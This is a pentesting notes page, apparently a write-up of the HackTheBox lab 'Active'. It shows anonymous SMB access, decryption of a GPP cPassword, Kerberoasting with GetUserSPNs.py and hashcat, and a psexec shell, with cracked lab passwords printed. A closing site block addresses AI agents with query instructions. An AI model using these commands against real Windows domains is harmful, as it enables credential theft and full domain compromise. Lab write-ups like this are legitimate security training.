# GPP/cPassword Attacks

* GPP will keep passwords in an XML file
* Works with smb
* If we find a 334 open we can try to login anonymously *Example from HTB - Active - Retired Machine*
* Tips: `prompt off` (will not prompt when dl file) and `recurse on` (will list everything)

  ```
  ┌──(kali㉿kali)-[~]
  └─$ smbclient \\\\10.10.10.100\\Replication
  Enter WORKGROUP\kali's password: 
  Anonymous login successful
  Try "help" to get a list of possible commands.
  smb: \> dir
    .                                   D        0  Sat Jul 21 06:37:44 2018
    ..                                  D        0  Sat Jul 21 06:37:44 2018
    active.htb                          D        0  Sat Jul 21 06:37:44 2018

                  5217023 blocks of size 4096. 260455 blocks available
  smb: \> prompt off
  smb: \> 
  ```
* We can get all the file using `mget *`
* We are interested in the group.xml file which has been downloaded in `active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/`\
  ![](/files/fvhRoO1R4Awj7pX9RueK)
* We can just copy cpassword and crackit using gpp-decrypt: `gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ` And we get the password: `GPPstillStandingStrong2k18`

## HTB - Active - privesc

* The password obtain with gpp only gave us user. To root the machine we use kerberoasting again:

  ```
  ┌──(kali㉿kali)-[~]
  └─$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
  /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

  ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon           
  --------------------  -------------  --------------------------------------------------------  -------------------  -------------------
  active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40  2022-02-11 16:21:53 

  $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$50b[STRIPPED]1
  ```
* We can then crack the password with hashcat

  ```
  ┌──(root💀kali)-[~/active-directory]
  └─# hashcat -m 13100 hashkerb.txt /usr/share/wordlists/rockyou.txt -O
  [STRIPPED]
  $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4[STRIPPED]1:Ticketmaster1968
  ```
* And finally get shell using psexec.py (Impacket)

  ```
  ┌──(root💀kali)-[~/active-directory]
  └─# psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100  
  ```

## GPP - Resources

{% embed url="<https://blog.rapid7.com/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/>" %}
Group Policy Pwnage
{% endembed %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://csbygb.gitbook.io/pentips/windows/post-compromise-attack/gpp.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.